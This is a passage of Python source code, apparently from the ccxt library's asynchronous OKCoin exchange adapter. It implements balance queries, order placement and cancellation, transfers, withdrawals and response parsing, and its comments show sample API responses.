result['datetime'] = self.iso8601(timestamp)
return self.safe_balance(result)
async def fetch_balance(self, params={}):
"""
query for balance and get the amount of funds available for trading or funds locked in orders
:param dict params: extra parameters specific to the okcoin api endpoint
:returns dict: a `balance structure <https://docs.ccxt.com/en/latest/manual.html?#balance-structure>`
"""
defaultType = self.safe_string_2(self.options, 'fetchBalance', 'defaultType')
type = self.safe_string(params, 'type', defaultType)
if type is None:
raise ArgumentsRequired(self.id + " fetchBalance() requires a type parameter(one of 'account', 'spot', 'margin', 'futures', 'swap')")
await self.load_markets()
suffix = 'Wallet' if (type == 'account') else 'Accounts'
method = type + 'Get' + suffix
query = self.omit(params, 'type')
response = await getattr(self, method)(query)
#
# account
#
# [
# {
# balance: 0,
# available: 0,
# currency: "BTC",
# hold: 0
# },
# {
# balance: 0,
# available: 0,
# currency: "ETH",
# hold: 0
# }
# ]
#
# spot
#
# [
# {
# frozen: "0",
# hold: "0",
# id: "2149632",
# currency: "BTC",
# balance: "0.0000000497717339",
# available: "0.0000000497717339",
# holds: "0"
# },
# {
# frozen: "0",
# hold: "0",
# id: "2149632",
# currency: "ICN",
# balance: "0.00000000925",
# available: "0.00000000925",
# holds: "0"
# }
# ]
#
# margin
#
# [
# {
# "currency:BTC": {
# "available":"0",
# "balance":"0",
# "borrowed":"0",
# "can_withdraw":"0",
# "frozen":"0",
# "hold":"0",
# "holds":"0",
# "lending_fee":"0"
# },
# "currency:USDT": {
# "available":"100",
# "balance":"100",
# "borrowed":"0",
# "can_withdraw":"100",
# "frozen":"0",
# "hold":"0",
# "holds":"0",
# "lending_fee":"0"
# },
# "instrument_id":"BTC-USDT",
# "liquidation_price":"0",
# "product_id":"BTC-USDT",
# "risk_rate":""
# },
# ]
#
# futures
#
# {
# "info":{
# "eos":{
# "auto_margin":"0",
# "contracts": [
# {
# "available_qty":"40.37069445",
# "fixed_balance":"0",
# "instrument_id":"EOS-USD-190329",
# "margin_for_unfilled":"0",
# "margin_frozen":"0",
# "realized_pnl":"0",
# "unrealized_pnl":"0"
# },
# {
# "available_qty":"40.37069445",
# "fixed_balance":"14.54895721",
# "instrument_id":"EOS-USD-190628",
# "margin_for_unfilled":"0",
# "margin_frozen":"10.64042157",
# "realized_pnl":"-3.90853564",
# "unrealized_pnl":"-0.259"
# },
# ],
# "equity":"50.75220665",
# "margin_mode":"fixed",
# "total_avail_balance":"40.37069445"
# },
# }
# }
#
# swap
#
# {
# "info": [
# {
# "equity":"3.0139",
# "fixed_balance":"0.0000",
# "instrument_id":"EOS-USD-SWAP",
# "margin":"0.5523",
# "margin_frozen":"0.0000",
# "margin_mode":"crossed",
# "margin_ratio":"1.0913",
# "realized_pnl":"-0.0006",
# "timestamp":"2019-03-25T03:46:10.336Z",
# "total_avail_balance":"3.0000",
# "unrealized_pnl":"0.0145"
# }
# ]
# }
#
return self.parse_balance_by_type(type, response)
def parse_balance_by_type(self, type, response):
if (type == 'account') or (type == 'spot'):
return self.parse_account_balance(response)
elif type == 'margin':
return self.parse_margin_balance(response)
elif type == 'futures':
return self.parse_futures_balance(response)
elif type == 'swap':
return self.parse_swap_balance(response)
raise NotSupported(self.id + " fetchBalance does not support the '" + type + "' type(the type must be one of 'account', 'spot', 'margin', 'futures', 'swap')")
async def create_order(self, symbol, type, side, amount, price=None, params={}):
"""
create a trade order
:param str symbol: unified symbol of the market to create an order in
:param str type: 'market' or 'limit'
:param str side: 'buy' or 'sell'
:param float amount: how much of currency you want to trade in units of base currency
:param float price: the price at which the order is to be fulfilled, in units of the quote currency, ignored in market orders
:param dict params: extra parameters specific to the okcoin api endpoint
:returns dict: an `order structure <https://docs.ccxt.com/en/latest/manual.html#order-structure>`
"""
await self.load_markets()
market = self.market(symbol)
request = {
'instrument_id': market['id'],
# 'client_oid': 'abcdef1234567890', # [a-z0-9]{1,32}
# 'order_type': '0', # 0 = Normal limit order, 1 = Post only, 2 = Fill Or Kill, 3 = Immediate Or Cancel, 4 = Market for futures only
}
clientOrderId = self.safe_string_2(params, 'client_oid', 'clientOrderId')
if clientOrderId is not None:
request['client_oid'] = clientOrderId
params = self.omit(params, ['client_oid', 'clientOrderId'])
method = None
if market['futures'] or market['swap']:
size = self.number_to_string(amount) if market['futures'] else self.amount_to_precision(symbol, amount)
request = self.extend(request, {
'type': type, # 1:open long 2:open short 3:close long 4:close short for futures
'size': size,
# 'match_price': '0', # Order at best counter party price?(0:no 1:yes). The default is 0. If it is set as 1, the price parameter will be ignored. When posting orders at best bid price, order_type can only be 0(regular order).
})
orderType = self.safe_string(params, 'order_type')
# order_type == '4' means a market order
isMarketOrder = (type == 'market') or (orderType == '4')
if isMarketOrder:
request['order_type'] = '4'
else:
request['price'] = self.price_to_precision(symbol, price)
if market['futures']:
request['leverage'] = '10' # or '20'
method = market['type'] + 'PostOrder'
else:
marginTrading = self.safe_string(params, 'margin_trading', '1') # 1 = spot, 2 = margin
request = self.extend(request, {
'side': side,
'type': type, # limit/market
'margin_trading': marginTrading, # 1 = spot, 2 = margin
})
if type == 'limit':
request['price'] = self.price_to_precision(symbol, price)
request['size'] = self.amount_to_precision(symbol, amount)
elif type == 'market':
# for market buy it requires the amount of quote currency to spend
if side == 'buy':
notional = self.safe_number(params, 'notional')
createMarketBuyOrderRequiresPrice = self.safe_value(self.options, 'createMarketBuyOrderRequiresPrice', True)
if createMarketBuyOrderRequiresPrice:
if price is not None:
if notional is None:
notional = amount * price
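# e.g.(hypothetical figures) amount=0.2 and price=2000 give notional=400 units of quote currency to spend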
elif notional is None:
raise InvalidOrder(self.id + " createOrder() requires the price argument with market buy orders to calculate total order cost(amount to spend), where cost = amount * price. Supply a price argument to createOrder() call if you want the cost to be calculated for you from price and amount, or, alternatively, add .options['createMarketBuyOrderRequiresPrice'] = False and supply the total cost value in the 'amount' argument or in the 'notional' extra parameter(the exchange-specific behaviour)")
else:
notional = amount if (notional is None) else notional
request['notional'] = self.cost_to_precision(symbol, notional)
else:
request['size'] = self.amount_to_precision(symbol, amount)
method = 'marginPostOrders' if (marginTrading == '2') else 'spotPostOrders'
response = await getattr(self, method)(self.extend(request, params))
#
# {
# "client_oid":"oktspot79",
# "error_code":"",
# "error_message":"",
# "order_id":"2510789768709120",
# "result":true
# }
#
order = self.parse_order(response, market)
return self.extend(order, {
'type': type,
'side': side,
})
async def cancel_order(self, id, symbol=None, params={}):
"""
cancels an open order
:param str id: order id
:param str symbol: unified symbol of the market the order was made in
:param dict params: extra parameters specific to the okcoin api endpoint
:returns dict: An `order structure <https://docs.ccxt.com/en/latest/manual.html#order-structure>`
"""
if symbol is None:
raise ArgumentsRequired(self.id + ' cancelOrder() requires a symbol argument')
await self.load_markets()
market = self.market(symbol)
type = None
if market['futures'] or market['swap']:
type = market['type']
else:
defaultType = self.safe_string_2(self.options, 'cancelOrder', 'defaultType', market['type'])
type = self.safe_string(params, 'type', defaultType)
if type is None:
raise ArgumentsRequired(self.id + " cancelOrder() requires a type parameter(one of 'spot', 'margin', 'futures', 'swap').")
method = type + 'PostCancelOrder'
request = {
'instrument_id': market['id'],
}
if market['futures'] or market['swap']:
method += 'InstrumentId'
else:
method += 's'
clientOrderId = self.safe_string_2(params, 'client_oid', 'clientOrderId')
if clientOrderId is not None:
method += 'ClientOid'
request['client_oid'] = clientOrderId
else:
method += 'OrderId'
request['order_id'] = id
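# the implicit API method name is assembled from the parts above, for example(derived from the
# string concatenation only): spot order by id -> 'spotPostCancelOrdersOrderId',
# futures order by client_oid -> 'futuresPostCancelOrderInstrumentIdClientOid'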
query = self.omit(params, ['type', 'client_oid', 'clientOrderId'])
response = await getattr(self, method)(self.extend(request, query))
result = response if ('result' in response) else self.safe_value(response, market['id'], {})
#
# spot, margin
#
# {
# "btc-usdt": [
# {
# "result":true,
# "client_oid":"a123",
# "order_id": "2510832677225473"
# }
# ]
# }
#
# futures, swap
#
# {
# "result": True,
# "client_oid": "oktfuture10", # missing if requested by order_id
# "order_id": "2517535534836736",
# "instrument_id": "EOS-USD-190628"
# }
#
return self.parse_order(result, market)
def parse_order_status(self, status):
statuses = {
'-2': 'failed',
'-1': 'canceled',
'0': 'open',
'1': 'open',
'2': 'closed',
'3': 'open',
'4': 'canceled',
}
return self.safe_string(statuses, status, status)
def parse_order_side(self, side):
sides = {
'1': 'buy', # open long
'2': 'sell', # open short
'3': 'sell', # close long
'4': 'buy', # close short
}
return self.safe_string(sides, side, side)
def parse_order(self, order, market=None):
#
# createOrder
#
# {
# "client_oid":"oktspot79",
# "error_code":"",
# "error_message":"",
# "order_id":"2510789768709120",
# "result":true
# }
#
# cancelOrder
#
# {
# "result": True,
# "client_oid": "oktfuture10", # missing if requested by order_id
# "order_id": "2517535534836736",
# # instrument_id is missing for spot/margin orders
# # available in futures and swap orders only
# "instrument_id": "EOS-USD-190628",
# }
#
# fetchOrder, fetchOrdersByState, fetchOpenOrders, fetchClosedOrders
#
# # spot and margin orders
#
# {
# "client_oid":"oktspot76",
# "created_at":"2019-03-18T07:26:49.000Z",
# "filled_notional":"3.9734",
# "filled_size":"0.001", # filled_qty in futures and swap orders
#         "funds":"", # this is most likely the same as notional
# "instrument_id":"BTC-USDT",
# "notional":"",
# "order_id":"2500723297813504",
# "order_type":"0",
# "price":"4013",
# "product_id":"BTC-USDT", # missing in futures and swap orders
# "side":"buy",
# "size":"0.001",
# "status":"filled",
# "state": "2",
# "timestamp":"2019-03-18T07:26:49.000Z",
# "type":"limit"
# }
#
# # futures and swap orders
#
# {
# "instrument_id":"EOS-USD-190628",
# "size":"10",
# "timestamp":"2019-03-20T10:04:55.000Z",
# "filled_qty":"10", # filled_size in spot and margin orders
# "fee":"-0.00841043",
# "order_id":"2512669605501952",
# "price":"3.668",
# "price_avg":"3.567", # missing in spot and margin orders
# "status":"2",
# "state": "2",
# "type":"4",
# "contract_val":"10",
# "leverage":"10", # missing in swap, spot and margin orders
# "client_oid":"",
#         "pnl":"1.09510794", # missing in swap, spot and margin orders
# "order_type":"0"
# }
#
id = self.safe_string(order, 'order_id')
timestamp = self.parse8601(self.safe_string(order, 'timestamp'))
side = self.safe_string(order, 'side')
type = self.safe_string(order, 'type')
if (side != 'buy') and (side != 'sell'):
side = self.parse_order_side(type)
marketId = self.safe_string(order, 'instrument_id')
market = self.safe_market(marketId, market)
amount = self.safe_string(order, 'size')
filled = self.safe_string_2(order, 'filled_size', 'filled_qty')
remaining = None
if amount is not None:
if filled is not None:
amount = Precise.string_max(amount, filled)
remaining = Precise.string_max('0', Precise.string_sub(amount, filled))
if type == 'market':
remaining = '0'
cost = self.safe_string_2(order, 'filled_notional', 'funds')
price = self.safe_string(order, 'price')
average = self.safe_string(order, 'price_avg')
if cost is None:
if filled is not None and average is not None:
cost = Precise.string_mul(average, filled)
else:
if (average is None) and (filled is not None) and Precise.string_gt(filled, '0'):
average = Precise.string_div(cost, filled)
status = self.parse_order_status(self.safe_string(order, 'state'))
feeCost = self.safe_number(order, 'fee')
fee = None
if feeCost is not None:
feeCurrency = None
fee = {
'cost': feeCost,
'currency': feeCurrency,
}
clientOrderId = self.safe_string(order, 'client_oid')
if (clientOrderId is not None) and (len(clientOrderId) < 1):
clientOrderId = None # fix empty clientOrderId string
stopPrice = self.safe_number(order, 'trigger_price')
return self.safe_order({
'info': order,
'id': id,
'clientOrderId': clientOrderId,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'lastTradeTimestamp': None,
'symbol': market['symbol'],
'type': type,
'timeInForce': None,
'postOnly': None,
'side': side,
'price': price,
'stopPrice': stopPrice,
'average': average,
'cost': cost,
'amount': amount,
'filled': filled,
'remaining': remaining,
'status': status,
'fee': fee,
'trades': None,
}, market)
async def fetch_order(self, id, symbol=None, params={}):
"""
fetches information on an order made by the user
:param str id: order id
:param str symbol: unified symbol of the market the order was made in
:param dict params: extra parameters specific to the okcoin api endpoint
:returns dict: An `order structure <https://docs.ccxt.com/en/latest/manual.html#order-structure>`
"""
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchOrder() requires a symbol argument')
await self.load_markets()
market = self.market(symbol)
defaultType = self.safe_string_2(self.options, 'fetchOrder', 'defaultType', market['type'])
type = self.safe_string(params, 'type', defaultType)
if type is None:
raise ArgumentsRequired(self.id + " fetchOrder() requires a type parameter(one of 'spot', 'margin', 'futures', 'swap').")
instrumentId = 'InstrumentId' if (market['futures'] or market['swap']) else ''
method = type + 'GetOrders' + instrumentId
request = {
'instrument_id': market['id'],
# 'client_oid': 'abcdef12345', # optional, [a-z0-9]{1,32}
# 'order_id': id,
}
clientOid = self.safe_string(params, 'client_oid')
if clientOid is not None:
method += 'ClientOid'
request['client_oid'] = clientOid
else:
method += 'OrderId'
request['order_id'] = id
query = self.omit(params, 'type')
response = await getattr(self, method)(self.extend(request, query))
#
# spot, margin
#
# {
# "client_oid":"oktspot70",
# "created_at":"2019-03-15T02:52:56.000Z",
# "filled_notional":"3.8886",
# "filled_size":"0.001",
# "funds":"",
# "instrument_id":"BTC-USDT",
# "notional":"",
# "order_id":"2482659399697408",
# "order_type":"0",
# "price":"3927.3",
# "product_id":"BTC-USDT",
# "side":"buy",
# "size":"0.001",
# "status":"filled",
# "state": "2",
# "timestamp":"2019-03-15T02:52:56.000Z",
# "type":"limit"
# }
#
# futures, swap
#
# {
# "instrument_id":"EOS-USD-190628",
# "size":"10",
# "timestamp":"2019-03-20T02:46:38.000Z",
# "filled_qty":"10",
# "fee":"-0.0080819",
# "order_id":"2510946213248000",
# "price":"3.712",
# "price_avg":"3.712",
# "status":"2",
# "state": "2",
# "type":"2",
# "contract_val":"10",
# "leverage":"10",
# "client_oid":"", # missing in swap orders
# "pnl":"0", # missing in swap orders
# "order_type":"0"
# }
#
return self.parse_order(response)
async def fetch_orders_by_state(self, state, symbol=None, since=None, limit=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchOrdersByState() requires a symbol argument')
await self.load_markets()
market = self.market(symbol)
type = None
if market['futures'] or market['swap']:
type = market['type']
else:
defaultType = self.safe_string_2(self.options, 'fetchOrder', 'defaultType', market['type'])
type = self.safe_string(params, 'type', defaultType)
if type is None:
raise ArgumentsRequired(self.id + " fetchOrdersByState() requires a type parameter(one of 'spot', 'margin', 'futures', 'swap').")
request = {
'instrument_id': market['id'],
# '-2': failed,
# '-1': cancelled,
# '0': open ,
# '1': partially filled,
# '2': fully filled,
# '3': submitting,
# '4': cancelling,
# '6': incomplete(open+partially filled),
# '7': complete(cancelled+fully filled),
'state': state,
}
method = type + 'GetOrders'
if market['futures'] or market['swap']:
method += 'InstrumentId'
query = self.omit(params, 'type')
response = await getattr(self, method)(self.extend(request, query))
#
# spot, margin
#
# [
#         # in fact, this documented API response does not correspond
# # to their actual API response for spot markets
# # OKEX v3 API returns a plain array of orders(see below)
# [
# {
# "client_oid":"oktspot76",
# "created_at":"2019-03-18T07:26:49.000Z",
# "filled_notional":"3.9734",
# "filled_size":"0.001",
# "funds":"",
# "instrument_id":"BTC-USDT",
# "notional":"",
# "order_id":"2500723297813504",
# "order_type":"0",
# "price":"4013",
# "product_id":"BTC-USDT",
# "side":"buy",
# "size":"0.001",
# "status":"filled",
# "state": "2",
# "timestamp":"2019-03-18T07:26:49.000Z",
# "type":"limit"
# },
# ],
# {
# "before":"2500723297813504",
# "after":"2500650881647616"
# }
# ]
#
# futures, swap
#
# {
# "result":true, # missing in swap orders
# "order_info": [
# {
# "instrument_id":"EOS-USD-190628",
# "size":"10",
# "timestamp":"2019-03-20T10:04:55.000Z",
# "filled_qty":"10",
# "fee":"-0.00841043",
# "order_id":"2512669605501952",
# "price":"3.668",
# "price_avg":"3.567",
# "status":"2",
# "state": "2",
# "type":"4",
# "contract_val":"10",
# "leverage":"10", # missing in swap orders
# "client_oid":"",
# "pnl":"1.09510794", # missing in swap orders
# "order_type":"0"
# },
# ]
# }
#
orders = None
if market['swap'] or market['futures']:
orders = self.safe_value(response, 'order_info', [])
else:
orders = response
responseLength = len(response)
if responseLength < 1:
return []
# in fact, this documented API response does not correspond
# to their actual API response for spot markets
# OKEX v3 API returns a plain array of orders
if responseLength > 1:
before = self.safe_value(response[1], 'before')
if before is not None:
orders = response[0]
return self.parse_orders(orders, market, since, limit)
async def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
"""
fetch all unfilled currently open orders
:param str symbol: unified market symbol
:param int|None since: the earliest time in ms to fetch open orders for
:param int|None limit: the maximum number of open orders structures to retrieve
:param dict params: extra parameters specific to the okcoin api endpoint
:returns [dict]: a list of `order structures <https://docs.ccxt.com/en/latest/manual.html#order-structure>`
"""
# '-2': failed,
# '-1': cancelled,
# '0': open ,
# '1': partially filled,
# '2': fully filled,
# '3': submitting,
# '4': cancelling,
# '6': incomplete(open+partially filled),
# '7': complete(cancelled+fully filled),
return await self.fetch_orders_by_state('6', symbol, since, limit, params)
async def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):
# '-2': failed,
# '-1': cancelled,
# '0': open ,
# '1': partially filled,
# '2': fully filled,
# '3': submitting,
# '4': cancelling,
# '6': incomplete(open+partially filled),
# '7': complete(cancelled+fully filled),
return await self.fetch_orders_by_state('7', symbol, since, limit, params)
def parse_deposit_address(self, depositAddress, currency=None):
#
# {
# address: '0x696abb81974a8793352cbd33aadcf78eda3cfdfa',
# currency: 'eth'
# tag: 'abcde12345', # will be missing if the token does not require a deposit tag
# payment_id: 'abcde12345', # will not be returned if the token does not require a payment_id
# # can_deposit: 1, # 0 or 1, documented but missing
# # can_withdraw: 1, # 0 or 1, documented but missing
# }
#
address = self.safe_string(depositAddress, 'address')
tag = self.safe_string_2(depositAddress, 'tag', 'payment_id')
tag = self.safe_string_2(depositAddress, 'memo', 'Memo', tag)
currencyId = self.safe_string(depositAddress, 'currency')
code = self.safe_currency_code(currencyId)
self.check_address(address)
return {
'currency': code,
'address': address,
'tag': tag,
'info': depositAddress,
}
async def fetch_deposit_address(self, code, params={}):
"""
fetch the deposit address for a currency associated with self account
:param str code: unified currency code
:param dict params: extra parameters specific to the okcoin api endpoint
:returns dict: an `address structure <https://docs.ccxt.com/en/latest/manual.html#address-structure>`
"""
await self.load_markets()
parts = code.split('-')
currency = self.currency(parts[0])
request = {
'currency': currency['id'],
}
response = await self.accountGetDepositAddress(self.extend(request, params))
#
# [
# {
# address: '0x696abb81974a8793352cbd33aadcf78eda3cfdfa',
# currency: 'eth'
# }
# ]
#
addressesByCode = self.parse_deposit_addresses(response)
address = self.safe_value(addressesByCode, code)
if address is None:
raise InvalidAddress(self.id + ' fetchDepositAddress() cannot return nonexistent addresses, you should create deposit addresses with the exchange website first')
return address
async def transfer(self, code, amount, fromAccount, toAccount, params={}):
"""
transfer currency internally between wallets on the same account
:param str code: unified currency code
:param float amount: amount to transfer
:param str fromAccount: account to transfer from
:param str toAccount: account to transfer to
:param dict params: extra parameters specific to the okcoin api endpoint
:returns dict: a `transfer structure <https://docs.ccxt.com/en/latest/manual.html#transfer-structure>`
"""
await self.load_markets()
currency = self.currency(code)
accountsByType = self.safe_value(self.options, 'accountsByType', {})
fromId = self.safe_string(accountsByType, fromAccount, fromAccount)
toId = self.safe_string(accountsByType, toAccount, toAccount)
request = {
'amount': self.currency_to_precision(code, amount),
'currency': currency['id'],
'from': fromId, # 1 spot, 5 margin, 6 funding
'to': toId, # 1 spot, 5 margin, 6 funding
'type': '0', # 0 Transfer between accounts in the main account/sub_account, 1 main account to sub_account, 2 sub_account to main account
}
if fromId == 'main':
request['type'] = '1'
request['sub_account'] = toId
request['to'] = '0'
elif toId == 'main':
request['type'] = '2'
request['sub_account'] = fromId
request['from'] = '0'
request['to'] = '6'
elif fromId == '5' or toId == '5':
marketId = self.safe_string_2(params, 'instrument_id', 'to_instrument_id')
if marketId is None:
symbol = self.safe_string(params, 'symbol')
if symbol is None:
raise ArgumentsRequired(self.id + ' transfer() requires an exchange-specific instrument_id parameter or a unified symbol parameter')
else:
params = self.omit(params, 'symbol')
market = self.market(symbol)
marketId = market['id']
if fromId == '5':
request['instrument_id'] = marketId
if toId == '5':
request['to_instrument_id'] = marketId
response = await self.accountPostTransfer(self.extend(request, params))
#
# {
# "transfer_id": "754147",
# "currency": "ETC",
# "from": "6",
# "amount": "0.1",
# "to": "1",
# "result": True
# }
#
return self.parse_transfer(response, currency)
def parse_transfer(self, transfer, currency=None):
#
# {
# "transfer_id": "754147",
# "currency": "ETC",
# "from": "6",
# "amount": "0.1",
# "to": "1",
# "result": True
# }
#
accountsById = self.safe_value(self.options, 'accountsById', {})
return {
'info': transfer,
'id': self.safe_string(transfer, 'transfer_id'),
'timestamp': None,
'datetime': None,
'currency': self.safe_currency_code(self.safe_string(transfer, 'currency'), currency),
'amount': self.safe_number(transfer, 'amount'),
'fromAccount': self.safe_string(accountsById, self.safe_string(transfer, 'from')),
'toAccount': self.safe_string(accountsById, self.safe_string(transfer, 'to')),
'status': self.parse_transfer_status(self.safe_string(transfer, 'result')),
}
def parse_transfer_status(self, status):
statuses = {
'true': 'ok',
}
return self.safe_string(statuses, status, 'failed')
async def withdraw(self, code, amount, address, tag=None, params={}):
"""
make a withdrawal
:param str code: unified currency code
:param float amount: the amount to withdraw
:param str address: the address to withdraw to
:param str|None tag: an optional tag(memo) for the withdrawal, appended to the address as 'address:tag' when provided
:param dict params: extra parameters specific to the okcoin api endpoint
:returns dict: a `transaction structure <https://docs.ccxt.com/en/latest/manual.html#transaction-structure>`
"""
tag, params = self.handle_withdraw_tag_and_params(tag, params)
self.check_address(address)
await self.load_markets()
currency = self.currency(code)
if tag:
address = address + ':' + tag
fee = self.safe_string(params, 'fee')
if fee is None:
raise ArgumentsRequired(self.id + " withdraw() requires a 'fee' string parameter, network transaction fee must be ≥ 0. Withdrawals to OKCoin or OKEx are fee-free, please set '0'. Withdrawing to external digital asset address requires network transaction fee.")
request = {
'currency': currency['id'],
'to_address': address,
'destination': '4', # 2 = OKCoin International, 3 = OKEx 4 = others
'amount': self.number_to_string(amount),
'fee': fee, # String. Network transaction fee ≥ 0. Withdrawals to OKCoin or OKEx are fee-free, please set as 0. Withdrawal to external digital asset address requires network transaction fee.
}
if 'password' in params:
request['trade_pwd'] = params['password']
elif 'trade_pwd' in params:
request['trade_pwd'] = params['trade_pwd']
elif self.password:
request['trade_pwd'] = self.password
query = self.omit(params, ['fee', 'password', 'trade_pwd'])
if not ('trade_pwd' in request):
raise ExchangeError(self.id + ' withdraw() requires self.password set on the exchange instance or a password / trade_pwd parameter')
response = await self.accountPostWithdrawal(self.extend(request, query))
#
# {
# "amount":"0.1",
# "withdrawal_id":"67485",
# "currency":"btc",
# "result":true
# }
#
return self.parse_transaction(response, currency)
async def fetch_deposits(self, code=None, since=None, limit=None, params={}):
"""
fetch all deposits made to an account
:param str|None code: unified currency code
:param int|None since: the earliest time in ms to fetch deposits for
:param int|None limit: the maximum number of deposits structures to retrieve
:param dict params: extra parameters specific to the okcoin api endpoint
:returns [dict]: a list of `transaction structures <https://docs.ccxt.com/en/latest/manual.html#transaction-structure>`
"""
await self.load_markets()
request = {}
method = 'accountGetDepositHistory'
currency = None
if code is not None:
currency = self.currency(code)
request['currency'] = currency['id']
method += 'Currency'
response = await getattr(self, method)(self.extend(request, params))
return self.parse_transactions(response, currency, since, limit, params)
async def fetch_withdrawals(self, code=None, since=None, limit=None, params={}):
"""
fetch all withdrawals made from an account
:param str|None code: unified currency code
:param int|None since: the earliest time in ms to fetch withdrawals for
:param int|None limit: the maximum number of withdrawals structures to retrieve
:param dict params: extra parameters specific to the okcoin api endpoint
:returns [dict]: a list of `transaction structures <https://docs.ccxt.com/en/latest/manual.html#transaction-structure>`
"""
await self.load_markets()
request = {}
method = 'accountGetWithdrawalHistory'
currency = None
if code is not None:
currency = self.currency(code)
request['currency'] = currency['id']
method += 'Currency'
response = await getattr(self, method)(self.extend(request, params))
return self.parse_transactions(response, currency, since, limit, params)
def parse_transaction_status(self, status):
#
# deposit statuses
#
# {
# '0': 'waiting for confirmation',
# '1': 'confirmation account',
# '2': 'recharge success'
# }
#
# withdrawal statues
#
# {
# '-3': 'pending cancel',
# '-2': 'cancelled',
# '-1': 'failed',
# '0': 'pending',
# '1': 'sending',
# '2': 'sent',
# '3': 'email confirmation',
# '4': 'manual confirmation',
# '5': 'awaiting identity confirmation'
# }
#
statuses = {
'-3': 'pending',
'-2': 'canceled',
'-1': 'failed',
'0': 'pending',
'1': 'pending',
'2': 'ok',
'3': 'pending',
'4': 'pending',
'5': 'pending',
}
return self.safe_string(statuses, status, status)
def parse_transaction(self, transaction, currency=None):
#
# withdraw
#
# {
# "amount":"0.1",
# "withdrawal_id":"67485",
# "currency":"btc",
# "result":true
# }
#
# fetchWithdrawals
#
# {
# amount: "4.72100000",
# withdrawal_id: "1729116",
# fee: "0.01000000eth",
# txid: "0xf653125bbf090bcfe4b5e8e7b8f586a9d87aa7de94598702758c0802b…",
# currency: "ETH",
# from: "7147338839",
# to: "0x26a3CB49578F07000575405a57888681249c35Fd",
# timestamp: "2018-08-17T07:03:42.000Z",
# status: "2"
# }
#
# fetchDeposits
#
# {
# "amount": "4.19511659",
# "txid": "14c9a8c925647cdb7e5b2937ea9aefe2b29b2c273150ad3f44b3b8a4635ed437",
# "currency": "XMR",
# "from": "",
# "to": "48PjH3ksv1fiXniKvKvyH5UtFs5WhfS2Vf7U3TwzdRJtCc7HJWvCQe56dRahyhQyTAViXZ8Nzk4gQg6o4BJBMUoxNy8y8g7",
# "tag": "1234567",
#         "deposit_id": 11571659, <-- we can use this
# "timestamp": "2019-10-01T14:54:19.000Z",
# "status": "2"
# }
#
type = None
id = None
address = None
withdrawalId = self.safe_string(transaction, 'withdrawal_id')
addressFrom = self.safe_string(transaction, 'from')
addressTo = self.safe_string(transaction, 'to')
tagTo = self.safe_string(transaction, 'tag')
if withdrawalId is not None:
type = 'withdrawal'
id = withdrawalId
address = addressTo
else:
# the payment_id will appear on new deposits but appears to be removed from the response after 2 months
id = self.safe_string_2(transaction, 'payment_id', 'deposit_id')
type = 'deposit'
address = addressTo
currencyId = self.safe_string(transaction, 'currency')
code = self.safe_currency_code(currencyId)
amount = self.safe_number(transaction, 'amount')
status = self.parse_transaction_status(self.safe_string(transaction, 'status'))
txid = self.safe_string(transaction, 'txid')
timestamp = self.parse8601(self.safe_string(transaction, 'timestamp'))
feeCost = None
if type == 'deposit':
feeCost = 0
else:
if currencyId is not None:
feeWithCurrencyId = self.safe_string(transaction, 'fee')
if feeWithCurrencyId is not None:
# https://github.com/ccxt/ccxt/pull/5748
lowercaseCurrencyId = currencyId.lower()
feeWithoutCurrencyId = feeWithCurrencyId.replace(lowercaseCurrencyId, '')
feeCost = float(feeWithoutCurrencyId)
# todo parse tags
return {
'info': transaction,
'id': id,
'currency': code,
'amount': amount,
'network': None,
'addressFrom': addressFrom,
'addressTo': addressTo,
'address': address,
'tagFrom': None,
'tagTo': tagTo,
'tag': tagTo,
'status': status,
'type': type,
'updated': None,
'txid': txid,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'fee': {
'currency': code,
'cost': feeCost,
},
}
def parse_my_trade(self, pair, market=None):
# check that trading symbols match in both entries
userTrade = self.safe_value(pair, 1)
otherTrade = self.safe_value(pair, 0)
firstMarketId = self.safe_string(otherTrade, 'instrument_id')
secondMarketId = self.safe_string(userTrade, 'instrument_id')
if firstMarketId != secondMarketId:
raise NotSupported(self.id + ' parseMyTrade() received unrecognized response format, differing instrument_ids in one fill, the exchange API might have changed, paste your verbose output: https://github.com/ccxt/ccxt/wiki/FAQ#what-is-required-to-get-help')
marketId = firstMarketId
market = self.safe_market(marketId, market)
symbol = market['symbol']
quoteId = market['quoteId']
side = None
amountString = None
costString = None
receivedCurrencyId = self.safe_string(userTrade, 'currency')
feeCurrencyId = None
if receivedCurrencyId == quoteId:
side = self.safe_string(otherTrade, 'side')
amountString = self.safe_string(otherTrade, 'size')
costString = self.safe_string(userTrade, 'size')
feeCurrencyId = self.safe_string(otherTrade, 'currency')
else:
side = self.safe_string(userTrade, 'side')
amountString = self.safe_string(userTrade, 'size')
costString = self.safe_string(otherTrade, 'size')
feeCurrencyId = self.safe_string(userTrade, 'currency')
id = self.safe_string(userTrade, 'trade_id')
priceString = self.safe_string(userTrade, 'price')
feeCostFirstString = self.safe_string(otherTrade, 'fee')
feeCostSecondString = self.safe_string(userTrade, 'fee')
feeCurrencyCodeFirst = self.safe_currency_code(self.safe_string(otherTrade, 'currency'))
feeCurrencyCodeSecond = self.safe_currency_code(self.safe_string(userTrade, 'currency'))
fee = None
fees = None
# fee is either a positive number(invitation rebate)
# or a negative number(transaction fee deduction)
# therefore we need to invert the fee
# more about it https://github.com/ccxt/ccxt/issues/5909
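# e.g. a raw fee of "-0.04647925"(a deduction) becomes a unified fee cost of "0.04647925",
# while a positive rebate would become a negative cost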
if (feeCostFirstString is not None) and not Precise.string_equals(feeCostFirstString, '0'):
if (feeCostSecondString is not None) and not Precise.string_equals(feeCostSecondString, '0'):
fees = [
{
'cost': Precise.string_neg(feeCostFirstString),
'currency': feeCurrencyCodeFirst,
},
{
'cost': Precise.string_neg(feeCostSecondString),
'currency': feeCurrencyCodeSecond,
},
]
else:
fee = {
'cost': Precise.string_neg(feeCostFirstString),
'currency': feeCurrencyCodeFirst,
}
elif (feeCostSecondString is not None) and not Precise.string_equals(feeCostSecondString, '0'):
fee = {
'cost': Precise.string_neg(feeCostSecondString),
'currency': feeCurrencyCodeSecond,
}
else:
fee = {
'cost': '0',
'currency': self.safe_currency_code(feeCurrencyId),
}
#
# simplified structures to show the underlying semantics
#
# # market/limit sell
#
# {
# "currency":"USDT",
# "fee":"-0.04647925", # ←--- fee in received quote currency
# "price":"129.13", # ←------ price
# "size":"30.98616393", # ←-- cost
# },
# {
# "currency":"ETH",
